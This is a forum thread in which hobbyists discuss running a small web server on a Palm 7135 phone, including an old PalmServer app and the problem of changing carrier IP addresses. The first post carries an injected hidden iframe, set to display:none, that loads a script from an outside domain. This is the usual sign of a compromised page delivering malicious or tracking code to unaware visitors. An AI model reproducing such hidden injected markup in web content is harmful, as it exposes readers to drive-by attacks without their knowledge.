+ Reply to Thread

Palm Web Server?

After reading about various old hardware that people have managed to get a web server running on, I'm curious if any exist for the Palm. Our 7135's have a decent connection (more than sufficient with the 1x rate) and our processor easily has enough power to serve up HTML pages.

Obviously I'm not talking an e-commerce transaction site, just a few pages that say "You're being served by a 7135 phone"

Plus, I can sit in meetings and say "My webserver is clipped to my belt"<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

PalmServer it is 6 years old.
    Attached Files

This looks cool, but do our phones have a fixed ip address? or will we need to reconfig each time that we connect to the net?

Verizon Changes IP addresses each time.

also, you would need to have a data connection constantly conected. Kinda makes the phone useless in this situation.

Well it keeps freezing up on me. Not sure if I'm "naming" my memo file wrong. I assume the name is just the first line in the memo file. Maybe it doesn't like the 7135. I'll keep trying and reply back if I figure out what I'm doing wrong.

Since it never passed version 1.0 it's obviously not practical, but definately cool. Thanks for the file robjae!

got it to work fine for me, I'm almost tempted to see if I could write something similar myself.